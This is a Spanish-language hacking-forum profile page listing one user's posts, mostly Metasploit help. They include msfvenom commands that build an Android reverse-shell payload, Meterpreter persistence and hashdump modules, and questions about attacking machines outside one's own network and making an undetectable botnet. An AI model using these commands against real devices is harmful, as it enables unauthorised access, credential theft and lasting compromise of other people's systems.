elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1] 2
1  Foros Generales / Dudas Generales / Re: Puerto Abierto (iphone-sync) en: 1 Agosto 2016, 17:33 pm
hola T0uRett3,

el puerto 62078, corresponde  al iphone-sync, que por lo que he visto, es un puerto en los dispositivos iphone, que se utiliza para conectarse con itunes, lo que me parece muy raro es que tengas ese puerto abierto en un dispositivo de tu red, ya que dices que todos los tuyos son iphone... pienso entonces que alguien se ha colado en tu red, verifica que no sea un dispositivo tuyo (si no es asi, desconozco porque ocurre esto),

un saludo!
2  Seguridad Informática / Hacking Ético / Re: metodos de persistencia metasploit en: 27 Junio 2016, 13:06 pm
hola xeroag

por lo que he visto, haces la persistencia desde la meterpreter (y según mi experiencia de metasploit) algunos comandos en la meterpreter dan lugar a fallos, como por ejemplo, siendo "nt system" (es decir, que has elevado privilegios y anteriormente has hecho el "getsysem"), al escribir el comando "hashdump" me ha arrojado errores, y es ilógico porque esta todo correcto, y eso me llevó a considerar varias alternativas, y acabé mandando la sesión a segundo plano (con "background") y use desde msf el comando "use post/windows/gather/hashdump" y efectivamente funcionó, ahora bien...por que te explico todo esto? porque quiero que veas que hay veces que la meterpreter falla, y nos volvemos locos buscando los errores. Por tanto, dos posibles soluciones con un mismo factor en común, ya citado antes (usar los modulos desde la msf):

* use exploit/windows/local/persistence
* use exploit/windows/local/registry_persistence
* use exploit/windows/local/vss_persistence
* use exploit/windows/local/s4u_persistence

Estos 4 son bastante efectivos, a mi personalmente me gusta (y me funciona) el 2º, ya que el problema que creo que puedes tener es que cuando ejecutas desde la meterpreter el script "run persistence..." (porque es un script), y pienso que puede tender a fallar, pues pienso que puede suceder es que el payload que mandas a anclarse al registro (por eso se llama persistencia, porque se inicia con el registro, eso hay que tenerlo en cuenta) no se engancha correctamente o simplemente no lo hace. Por tanto, con esto creo que la persistencia tendría un buen resultado, ves probando otros metodos y comprobando que se ancla en el registro, espero haberte ayudado,

Posdata: esto es un copia y pega de un mensaje anterior dirigido (por mi) hacia otro compañero que tenía un problema similar, te dejo el link por si quieres consultarlo:

https://foro.elhacker.net/hacking_basico/no_funciona_la_persistencia_en_metasploit_framework-t454127.0.html

un saludo! -by secu
3  Seguridad Informática / Hacking Básico / Re: No funciona la persistencia en metasploit framework en: 27 Junio 2016, 13:02 pm
hola kilerpi

por lo que he visto, haces la persistencia desde la meterpreter (y según mi experiencia de metasploit) algunos comandos en la meterpreter dan lugar a fallos, como por ejemplo, siendo "nt system" (es decir, que has elevado privilegios y anteriormente has hecho el "getsysem"), al escribir el comando "hashdump" me ha arrojado errores, y es ilógico porque esta todo correcto, y eso me llevó a considerar varias alternativas, y acabé mandando la sesión a segundo plano (con "background") y use desde msf el comando "use post/windows/gather/hashdump" y efectivamente funcionó, ahora bien...por que te explico todo esto? porque quiero que veas que hay veces que la meterpreter falla, y nos volvemos locos buscando los errores. Por tanto, dos posibles soluciones con un mismo factor en común, ya citado antes (usar los modulos desde la msf):

* use exploit/windows/local/persistence
* use exploit/windows/local/registry_persistence
* use exploit/windows/local/vss_persistence
* use exploit/windows/local/s4u_persistence

Estos 4 son bastante efectivos, a mi personalmente me gusta (y me funciona) el 2º, ya que el problema que creo que puedes tener es que cuando ejecutas desde la meterpreter el script "run persistence..." (porque es un script), y pienso que puede tender a fallar, pues pienso que puede suceder es que el payload que mandas a anclarse al registro (por eso se llama persistencia, porque se inicia con el registro, eso hay que tenerlo en cuenta) no se engancha correctamente o simplemente no lo hace. Por tanto, con esto creo que la persistencia tendría un buen resultado, ves probando otros metodos y comprobando que se ancla en el registro, espero haberte ayudado,

un saludo! -by secu
4  Seguridad Informática / Bugs y Exploits / Re: problema con payload en android en: 26 Junio 2016, 18:12 pm
hola,
por lo que tengo entendido, tu quieres conseguir una shell remota infectando a un android con un payload que generas con msfvenom (que el comando que yo he visto esta bien, por tanto intuyo que la aplicación/payload se crea correctamente), y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a  traves de la meterpreter conseguir una shell remota?
si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android  victima con comandos linux y ya esta.

ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload?

un saludo y a ver si lo solucionamos -by secu


posdata:

el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería:

"msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk"
5  Seguridad Informática / Hacking Básico / Re: msfvenom... en: 23 Junio 2016, 20:47 pm
msfvenom dejo atras a msfpayload, digamos que msfvenom combina msfpayload (para crear payloads) y msfencode (para encodear los payloads y ofuscar el código), por tanto yo creo que no hace falta incluir la ofuscación "shikata_ga_nai".

si dices que te crea el payload con 0 kb, será problema del msfvenom o de alguna dependencia incumplida o algun fallo en la instalación de metasploit, por tanto, prueba si te deja con otros payloads e introduciendo el comando bien y pues si hay fallos, puedes buscar el error, o reinstalar, comprobando que se monta todo correctamente, saludos!
6  Foros Generales / Noticias / Re: Tumblr se convierte en la nueva herramienta del ISIS. Así la utilizan en: 25 Diciembre 2015, 14:24 pm
Interesante, me comentaron el otro día que el DAESH se comunicaban entre ellos por medio de una puerta trasera de Internet (así  me lo comentaron textualmente) con mensajes cifrados y codificados.
Por cierto, alguien sabe algo sobre los ataques previstos por Anonymous contra Isis?
7  Seguridad Informática / Hacking Ético / Re: Nebula Curso de "Ethical Hacking" en: 23 Diciembre 2015, 12:14 pm
Hola compañero Crack81
El MXN (es el peso mexicano) 5000 equivalen a unos 265 euros, creo que con eso respondo a tu pregunta del costo;
por otro lado, en la imagen salen todas las cosas sobre las que se van a hablar, si tienes alguna duda, creo yo que sería recomendable mandársela a su correo (de Nebula), el curso esta muy bien, yo consultaré a ver cuando se impartirá y más cosas, te animo a que te unas, el conocimiento es la base de la vida, Saludos compañero!
8  Seguridad Informática / Hacking Ético / identificar el objetivo fuera de lan en: 23 Diciembre 2015, 12:10 pm
Hola, Buenos días a todos los foreros de elhacker.net
me llamo raul, y soy autor solitario de un pequeñísimo blog de seguridad informática (si, un tópico...) que esta en desarrollo.
Y desde hace ya un tiempo, he estado trasteando con el tema de los backdoors y payloads, ademas de los métodos básicos de pentest, y claro... mediante el libro Metasploit de (Pablo Gonzalez y Chema Alonso) he aprendido a tocar el tema a fondo, pero me surge una duda terrible que me gustaría aclarar, ya que no encuentro solución:
Cuando quiero identificar a la posible victima (ordenador portátil de mi hermana ;D) dentro de una Lan (mi Lan), con un Nmap consigo sacar muchísima información y poder realizar un buen ataque (Recopilación de información en el Libro de Metasploit), y bueno, esto está genial, pero claro, pongamos un ejemplo:
"Yo selecciono una victima XP (SO) en una red Lan de la que soy ajeno, por tanto no tengo la contraseña, y por tanto no se nada más que la existencia de este equipo XP muy fácil de vulnerar pero me encuentro ante una incapacidad de utilizar el nmap fuera de la Lan, que haría aquí? Sería necesario entrar en la Wi-Fi (supongamos que pueda) para poder realizar el ataque?, No hay ningún método para realizar un escaneo fuera de Lan?"
Espero sus respuestas, es un tema que me tiene fascinado y confundido, me ayudaría mucho, muchas gracias a todos los posibles lectores, un saludo!
9  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Está bien esta idea? en: 27 Octubre 2015, 15:07 pm
Nevachana, para inexpertos o ignorantes como yo, podrías explicarnos técnicamente lo que es un botnet y como crear uno para aprender su funcionamiento? y sobretodo, como hacerlo indetectable?
un saludo compañero!
10  Seguridad Informática / Análisis y Diseño de Malware / Re: Ayuda [Virus] Como elimino el virus que crea accesos directos en Usb en: 24 Octubre 2015, 09:51 am
Hola compañero, me considero muy aficionado al tema (pero sin grandes dotes), has probado en arrancar con un modo de recuperación, tipo avira, y chequear la unidad correspondiente a tu usb?
haz una cosa, prueba a subir el archivo a virustotal.com y pasas captura y vemos que te sale,
un saludo
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines